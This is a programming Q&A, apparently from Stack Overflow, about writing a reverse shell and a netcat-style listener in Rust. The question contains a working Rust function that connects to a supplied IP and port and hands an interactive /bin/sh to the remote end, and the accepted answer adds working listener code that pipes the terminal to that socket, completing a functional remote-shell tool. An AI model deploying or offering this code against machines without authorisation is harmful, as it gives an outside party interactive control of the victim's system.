# How to interact with a reverse shell in Rust?

Tags: sockets, tcp, rust, netcat, reverse-shell

OpenBSD's  [Netcat implementation](https://github.com/openbsd/src/blob/master/usr.bin/nc/netcat.c) listens on a port with `unix_bind()`... basically the same behavior as Rust's `TcpListener::bind()`. Where I got lost in writing my `listen` function (emulating `nc -l -p <port>`) is how to interact with reverse shells.

As seemingly trivial as it sounds, I want `listen` to give me the `sh-3.2$` prompt like `nc -l -p <port>` does. All the Netcat-Rust implementations I dug up online don't allow me to interact with reverse shells like that.

Reverse shell code (Machine 1): (adapted from [this question](https://stackoverflow.com/questions/48958814/what-is-the-rust-equivalent-of-a-reverse-shell-script-written-in-python) I asked years ago)

```
fn reverse_shell(ip: &str, port: &str) {
    let s = TcpStream::connect((ip, port)).unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn().unwrap().wait().unwrap();
}
```

Listening code (Machine 2):

```
fn listen(port: u16) {
   let x = std::net::TcpListener::bind(("0.0.0.0", port)).unwrap();
   let (mut stream, _) = x.accept().unwrap();
   // How do I interact with the shell now??
}
```

There's a certain simplicity and elegance to Rust code that helps me understand succinctly what's going on, which is why I don't want to just copy the C code from Netcat.

Answer (score 2, accepted):

Basically, we want to have two bi-directional redirections - one from `stdin` to the `stream`, and the other from `stream` to `stdout`.

We can accomplish this using the generic `pipe_thread` function below, which creates a dedicated OS thread for this (can be done more efficiently, but we want simplicity). In `listen`, we spawn two threads like this, and wait for them to terminate.

```
fn pipe_thread<R, W>(mut r: R, mut w: W) -> std::thread::JoinHandle<()>
where R: std::io::Read + Send + 'static,
      W: std::io::Write + Send + 'static
{
    std::thread::spawn(move || {
        let mut buffer = [0; 1024];
        loop {
            let len = r.read(&mut buffer).unwrap();
            if len == 0 {
                break;
            }
            w.write(&buffer[..len]).unwrap();
            w.flush().unwrap();
        }
    })
}

fn listen(port: u16) {
   let x = std::net::TcpListener::bind(("0.0.0.0", port)).unwrap();
   let (mut stream, _) = x.accept().unwrap();
   let t1 = pipe_thread(std::io::stdin(), stream.try_clone().unwrap());
   let t2 = pipe_thread(stream, std::io::stdout());
   t1.join();
   t2.join();
}
```

Comment: Hey Dan, tested your code, just add `w.flush();` right after `w.write`: on my system buffers are not flushed from time to time, and it leads to "glitches" in terminal. Thanks!

Comment: Thanks for the suggestion!